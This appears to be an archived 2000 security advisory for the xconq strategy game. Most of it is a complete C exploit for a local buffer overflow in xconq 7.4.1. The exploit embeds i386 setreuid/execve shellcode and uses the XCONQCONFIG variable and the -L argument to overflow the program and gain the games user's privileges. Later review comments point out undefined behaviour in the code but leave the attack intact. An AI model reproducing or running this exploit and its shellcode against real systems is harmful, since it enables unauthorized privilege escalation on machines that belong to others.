Exploit code for xconq has been released (XCONQCONFIG)
27 Dec. 2000
Summary
Xconq is a general strategy game system. It is a complete system that includes all the components: a portable engine, graphical interfaces for Unix/Linux/X11, Macintosh, and Windows, multiple AIs, networking for multi-player games, and an extensive game library. A security vulnerability in the product can be exploited to gain elevated privileges.
Exploit:
The exploit code below can be used to test for this vulnerability.
/* (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]. this
will give you uid=games on systems with xconq. this exploit was slightly
more work than i thought it was going to be. i originally wrote this
exploit for the -g parameter. but, via the -g parameter you must have a
display. via the -L parameter you do not need a display, but it is much
more exact. in this method you have to fill the XCONQCONFIG environmental
variable to a certain point to be able to overwrite the eip via the -L
parameter. (64 bytes is more than enough). i also needed to modify some
shellcode for this. all in all, too much work for what it is worth.
Xconq is free software and you are welcome to distribute copies of it
under certain conditions; type "o copying" to see the conditions.
There is absolutely no warranty for Xconq; type "o warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------
note: built and tested on slackware. some other overflowable functions i
will mention are the -g parameter and the XCONQLIB environmental
variable, both of those overflows require a display to exploit.
this program also has an odd usage of setuid(); in it to drop its
privileges -- making it possible to break. and yes, i squished the
code together on purpose. why? i am a *x80 resolution kinda guy :/.
*/
// Tunables.  PATH is the xconq binary this harness was written against
// (7.4.1 per the header comment).  DEFAULT_CAP (507) is below the 512-byte
// bofeip array in main(), so the default terminator write bofeip[cap]=0 stays
// in bounds; main() accepts a user cap up to 512 inclusive, which does not.
// No #include appears anywhere in this file, so every library call below is
// an implicit declaration (removed in C99).
#define PATH "/usr/local/bin/xconq" // path to xconq7.4.1.
#define DEFAULT_ALIGN 0 // generic alignment.
#define DEFAULT_OFFSET -5000 // generic offset. (from bufsize)
#define DEFAULT_UID 20 // user id of games.
#define DEFAULT_CAP 507 // exact buffer cut off point.
#define FILLER 0x78 // filling character, for misc use.
// Raw i386 Linux machine code, described by the author as setreuid()+exec().
// Kept non-const because main() patches it in place: bytes 10, 22 and 24 are
// 0x00 in this literal and are overwritten with the uid (exec[10]=uid; ...).
// Until that patch, strlen(exec) stops at byte 10 — main()'s padding loop
// measures the string before the patch and its memcpy() after it.
static char exec[]= // setreuid()+exec(): v9@fakehalo.org.
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01";
// Returns the current stack pointer.  The inline asm copies %esp into %eax
// (the i386 integer return register) and the function has no C return
// statement, so it relies on the compiler leaving %eax untouched afterwards:
// falling off the end of a non-void function whose value is used is UB in
// standard C, and the instruction is i386-only.
long esp(void){__asm__("movl %esp,%eax");}
// Entry point.  Parses [offset] [alignment] [user id] [cap] from argv (with
// defaults from the #defines), fills bofeip (passed as the -L argument), env
// (exported as EXEC) and push (exported as XCONQCONFIG), then replaces this
// process with PATH via execl().  Returns only if execl() fails.
int main(int argc,char **argv){
// bofeip: -L argument; env: EXEC value; push: XCONQCONFIG value.
char bofeip[512],env[4096],push[64];int i,offset,align,uid,cap;long ret;
printf("[ (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]"
". ]\n");
// Help text.  argv[1] is checked for NULL before each strcmp().
if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
printf("*** [syntax]: %s [offset] [alignment] [user id] [capoff buffer value"
"].\n",argv[0]);
printf("*** [required]: argument alignment value must be: 0-3.\n");
printf("*** [required]: argument user id value must be: 1-255.\n");
// NOTE(review): %d with a size_t (sizeof) is a format/argument mismatch;
// %zu is the matching specifier.  Same issue in the cap error and data lines.
printf("*** [required]: argument cap value must be: 1-%d.\n",sizeof(bofeip));
exit(0);
}
// atoi() reports no errors: a non-numeric argument silently becomes 0.
if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
// Alignment must be 0-3; anything else is reported and replaced by the default.
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",
argv[2]);align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
// uid must fit in one byte (1-255); it is written into exec below.
if(argc>3){
if(atoi(argv[3])<1||atoi(argv[3])>255){
printf("*** [error]: ignored argument uid value: %s. (use 1-255)\n",
argv[3]);uid=DEFAULT_UID;
}
else{uid=atoi(argv[3]);}
}
else{uid=DEFAULT_UID;}
// cap is accepted up to sizeof(bofeip) == 512 inclusive; bofeip[cap] below is
// then one past the array.  The int-vs-size_t comparison is safe only because
// the "<1" test short-circuits negative values first.
if(argc>4){
if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
printf("*** [error]: ignored argument cap value: %s. (use 1-%d)\n",argv[4],
sizeof(bofeip));cap=DEFAULT_CAP;
}
else{cap=atoi(argv[4]);}
}
else{cap=DEFAULT_CAP;}
// ret = current stack pointer minus offset; the first align bytes are FILLER.
ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
// Stores ret every 4 bytes.  sizeof(long) is 4 on the i386 target this was
// written for; on LP64 each store is 8 bytes and the last one can run past
// the end of bofeip.  The cast is an unaligned, non-char-typed store (memcpy
// is the well-defined form), and int i is compared against a size_t.
for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long *)&bofeip[i]=ret;}
// Terminator; out of bounds when cap == 512 (see the cap check above).
bofeip[cap]=0x0;
// 0x90 padding up to sizeof(env)-strlen(exec)-strlen(bofeip).
// NOTE(review): exec[10] is still 0x00 here (patched on the next line), so
// strlen(exec) evaluates to 10 — less than the full length memcpy() copies
// below.  For small cap values env+i+strlen(exec) can pass the end of env.
for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
// Patches the three uid bytes, then appends exec after the padding.
exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
// Terminates env and prints the chosen parameters.  The sizeof values and the
// nop expression are size_t printed with %d (format mismatch, see above).
env[(i+strlen(exec))]=0x0;printf("*** [data]: addr: 0x%lx, offset: %d, alignm"
"ent: %d, uid: %d, cap: %d.\n*** [data]: sizeof(bofeip): %d, sizeof(env): %d,"
" sizeof(push): %d, nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
sizeof(env),sizeof(push),(strlen(env)-strlen((char *)strrchr(env,0x90))+1));
// push is filled with FILLER but no terminator is placed within its 64 bytes.
setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
// NOTE(review): push[sizeof(push)] is one past the end of push — an
// out-of-bounds write (UB) that setenv() then depends on for termination.
push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
// execl() only returns on failure, so this body is the error path.  The
// variadic terminator should be a null pointer of pointer type ((char *)0 /
// NULL), not a bare int 0; the message names argv[0] rather than PATH, the
// program that actually failed to run.
if(execl(PATH,PATH,"-L",bofeip,0)){
printf("*** [error]: could not execute %s properly.\n",argv[0]);
exit(-1);
}
}